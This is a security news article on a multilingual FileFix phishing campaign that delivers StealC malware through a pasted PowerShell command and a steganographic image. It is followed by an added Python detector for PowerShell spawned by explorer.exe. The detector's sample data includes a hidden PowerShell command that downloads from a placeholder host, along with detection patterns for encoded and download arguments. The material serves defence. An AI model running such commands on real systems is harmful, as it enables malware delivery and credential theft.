Husain Parvez
Published on: September 23, 2025
A new wave of FileFix phishing attacks has emerged worldwide, combining advanced obfuscation, steganography, and multilingual lures to deliver StealC malware. According to researchers at Acronis, this is the most sophisticated FileFix campaign observed to date, rapidly expanding less than three months after the attack method was first publicly discussed.
Originally conceived by red team researcher “mr.d0x” in June 2025, FileFix builds on a social engineering concept where victims are tricked into pasting malicious commands into the File Explorer address bar. Unlike the earlier ClickFix method, which relied on the Run dialog, FileFix leverages trusted browser and OS behaviors to appear less suspicious.
The attack starts with a convincing phishing email, often mimicking Facebook’s security team. Targets are redirected to a spoofed support page in their local language, warning that their account may be suspended. Victims are then instructed to “appeal” by copying a supposed file path into File Explorer, but the clipboard actually contains a hidden PowerShell command.
“The observed campaign uses a highly convincing, multilingual phishing site (e.g., fake Facebook Security page), with anti-analysis techniques and advanced obfuscation to evade detection,” said Acronis researcher Eliad Kimhy.
Once executed, the command fetches an image from a Bitbucket repository that contains an embedded second-stage payload. This is decoded into a Go-based loader, which launches shellcode to install StealC, an info-stealer that targets credentials, browsers, and crypto wallets.
Researchers noted that the phishing site has been translated into at least 16 languages and uploaded to VirusTotal from countries including the US, Germany, China, and the Philippines. “The adversary behind this attack demonstrated significant investment in tradecraft,” Acronis wrote, citing the campaign’s carefully engineered delivery, infrastructure, and evasion tactics.
The campaign highlights the growing use of benign-looking browser features and cloud platforms to bypass detection. Security teams are urged to train users against copying commands from unknown web sources and to monitor clipboard and PowerShell activity more closely.
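To make that last recommendation concrete, here is an added example (not code from the article or from Acronis) of a process-level check a security team could run over endpoint process-creation telemetry: it flags PowerShell whose parent is explorer.exe, which is what a command pasted into the File Explorer address bar produces, and raises the severity when hidden-window, profile-bypass, encoded-command or download-style arguments are present. The event fields, file paths and placeholder URL are constructed, and the explorer.exe-parent signal is an assumption of this example rather than a detail stated in the article.

```python
import re

# Constructed process-creation events (Sysmon-style fields), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -nop -c "iwr http://placeholder.invalid/a.png -OutFile $env:TEMP\\a.png"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmd": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -File build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe"},
]

PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Argument patterns that raise the severity of an explorer.exe -> PowerShell event.
SUSPICIOUS_ARGS = [
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "profile bypass"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I), "network download"),
]

def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, reasons): 0 = ignore, 1 = review, 2 = high."""
    if basename(event["image"]) not in PS_IMAGES:
        return 0, []
    # Assumption of this example: a command pasted into the File Explorer address
    # bar is launched by explorer.exe, not by a terminal or script host.
    if basename(event["parent"]) != "explorer.exe":
        return 0, []
    reasons = ["PowerShell spawned by explorer.exe (address-bar execution)"]
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(event["cmd"]):
            reasons.append(label)
    return (2 if len(reasons) > 1 else 1), reasons

def triage(events):
    """Keep only events worth an analyst's attention, highest severity first."""
    hits = [(classify(e), e["cmd"]) for e in events]
    return sorted([(s, r, c) for (s, r), c in hits if s], key=lambda h: -h[0])
```

A bare explorer.exe-to-PowerShell launch is kept at the lower severity on purpose, since some administrators do start PowerShell from the address bar; the argument patterns are what separate that from a FileFix-style paste.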